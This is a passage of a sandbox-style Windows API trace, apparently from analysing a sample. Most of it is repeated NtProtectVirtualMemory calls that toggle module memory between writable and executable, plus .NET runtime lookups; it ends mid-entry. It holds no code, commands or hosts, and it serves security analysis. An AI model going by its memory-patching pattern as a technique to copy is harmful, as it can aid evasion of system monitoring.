ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711540, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.242] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x7771175c, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.242] GetCurrentProcess () returned 0xffffffff [0069.242] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x7771175c, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.242] GetCurrentProcess () returned 0xffffffff [0069.242] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711768, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.242] GetCurrentProcess () returned 0xffffffff [0069.242] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711768, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.242] GetCurrentProcess () returned 0xffffffff [0069.242] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117b8, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.243] GetCurrentProcess () returned 0xffffffff [0069.243] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117b8, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.243] GetCurrentProcess () returned 0xffffffff [0069.243] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117bc, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.243] GetCurrentProcess () returned 0xffffffff [0069.243] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117bc, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.243] GetCurrentProcess () returned 0xffffffff [0069.243] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117c8, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.243] GetCurrentProcess () returned 0xffffffff [0069.243] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117c8, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.243] GetCurrentProcess () returned 0xffffffff [0069.243] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117d0, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.244] GetCurrentProcess () returned 0xffffffff [0069.244] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x777117d0, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.244] GetCurrentProcess () returned 0xffffffff [0069.244] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x7771180c, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.244] GetCurrentProcess () returned 0xffffffff [0069.244] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x7771180c, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.244] GetCurrentProcess () returned 0xffffffff [0069.244] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x7771182c, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.244] GetCurrentProcess () returned 0xffffffff [0069.244] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x7771182c, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.244] GetCurrentProcess () returned 0xffffffff [0069.244] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711860, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x4, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x20) returned 0x0 [0069.245] GetCurrentProcess () returned 0xffffffff [0069.245] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eeebc*=0x77711860, NumberOfBytesToProtect=0x6eeec0, NewAccessProtection=0x20, OldAccessProtection=0x6eeef4 | out: BaseAddress=0x6eeebc*=0x77711000, NumberOfBytesToProtect=0x6eeec0, OldAccessProtection=0x6eeef4*=0x4) returned 0x0 [0069.246] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0069.246] FreeLibrary (hLibModule=0x77710000) returned 1 [0069.247] SysReAllocStringLen (in: pbstr=0x6eefb0*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x6eefb0*="mscoree.dll") returned 1 [0069.247] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0069.247] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x75620000 [0069.250] GetProcAddress (hModule=0x75620000, lpProcName=0x8e) returned 0x75634c4d [0069.251] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0069.251] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0069.251] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0069.251] GetLastError () returned 0xcb [0069.251] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560010, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.252] GetCurrentProcess () returned 0xffffffff [0069.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560010, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.252] GetCurrentProcess () returned 0xffffffff [0069.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560014, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.252] GetCurrentProcess () returned 0xffffffff [0069.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560014, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.252] GetCurrentProcess () returned 0xffffffff [0069.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560018, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.252] GetCurrentProcess () returned 0xffffffff [0069.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560018, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.252] GetCurrentProcess () returned 0xffffffff [0069.252] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x7556002c, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.253] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x7556002c, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.253] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560048, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.253] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560048, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.253] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560050, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.253] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560050, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.253] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560074, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.253] GetCurrentProcess () returned 0xffffffff [0069.254] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560074, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.254] GetCurrentProcess () returned 0xffffffff [0069.254] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600a4, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.254] GetCurrentProcess () returned 0xffffffff [0069.254] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600a4, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.254] GetCurrentProcess () returned 0xffffffff [0069.254] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600a8, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.254] GetCurrentProcess () returned 0xffffffff [0069.254] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600a8, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.254] GetCurrentProcess () returned 0xffffffff [0069.254] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600ac, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.255] GetCurrentProcess () returned 0xffffffff [0069.255] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600ac, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.255] GetCurrentProcess () returned 0xffffffff [0069.255] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600b4, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.255] GetCurrentProcess () returned 0xffffffff [0069.255] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600b4, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.255] GetCurrentProcess () returned 0xffffffff [0069.255] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600c0, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.255] GetCurrentProcess () returned 0xffffffff [0069.255] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755600c0, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.255] GetCurrentProcess () returned 0xffffffff [0069.255] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560104, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560104, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560150, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x75560150, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x7556016c, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x7556016c, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755601b4, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x4, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x2) returned 0x0 [0069.256] GetCurrentProcess () returned 0xffffffff [0069.256] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef32c*=0x755601b4, NumberOfBytesToProtect=0x6ef330, NewAccessProtection=0x2, OldAccessProtection=0x6ef364 | out: BaseAddress=0x6ef32c*=0x75560000, NumberOfBytesToProtect=0x6ef330, OldAccessProtection=0x6ef364*=0x4) returned 0x0 [0069.259] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0069.262] GetLastError () returned 0x2 [0069.262] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", len=0x35 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll") returned 1 [0069.262] GetThreadLocale () returned 0x409 [0069.262] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.263] GetThreadLocale () returned 0x409 [0069.263] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", lpFilePart=0x6ee99c*="clr.dll") returned 0x34 [0069.263] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll") returned 1 [0069.263] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll") returned 1 [0069.263] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", cchLength=0x34 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll") returned 0x34 [0069.263] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll") returned 1 [0069.263] SetLastError (dwErrCode=0x2) [0069.263] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0069.264] GetLastError () returned 0x2 [0069.264] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", len=0x3a | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll") returned 1 [0069.264] GetThreadLocale () returned 0x409 [0069.264] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.264] GetThreadLocale () returned 0x409 [0069.264] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", lpFilePart=0x6ee99c*="mscorwks.dll") returned 0x39 [0069.264] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll") returned 1 [0069.264] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x6eebcc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll") returned 1 [0069.264] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", cchLength=0x39 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll") returned 0x39 [0069.264] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x6eec1c*="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll") returned 1 [0069.264] SetLastError (dwErrCode=0x2) [0069.265] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0069.265] GetLastError () returned 0x2 [0069.265] SysReAllocStringLen (in: pbstr=0x6eec1c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", len=0x35 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll") returned 1 [0069.265] GetThreadLocale () returned 0x409 [0069.265] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0069.265] GetThreadLocale () returned 0x409 [0069.265] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0069.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", nBufferLength=0x104, lpBuffer=0x6ee9a0, lpFilePart=0x6ee99c | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", lpFilePart=0x6ee99c*="clr.dll") returned 0x34 [0069.265] SysReAllocStringLen (in: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x6eec1c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll") returned 1 [0069.265] SysReAllocStringLen (in: pbstr=0x6eebcc*=0x0, 